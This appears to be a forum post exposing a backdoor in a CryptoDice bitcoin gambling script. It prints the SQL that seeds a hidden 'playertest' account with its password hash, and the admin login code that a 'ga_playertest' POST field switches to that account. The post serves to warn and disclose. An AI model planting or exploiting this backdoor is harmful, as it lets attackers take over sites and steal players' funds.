Original Threadhttps://bitcointalk.org/index.php?topic=908996.0OutcomeCoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this I looked at the admin login script (
https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
if (!empty($_POST['ga_playertest'])) {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
This allows the fake admin to login and withdraw your funds, Please see solution below.
SolutionDo not use
or
Buy johny1976's original copies, If you are unsure of any code please ask an experience developer on these forums.
https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice
*Buying the original copy also supports development*
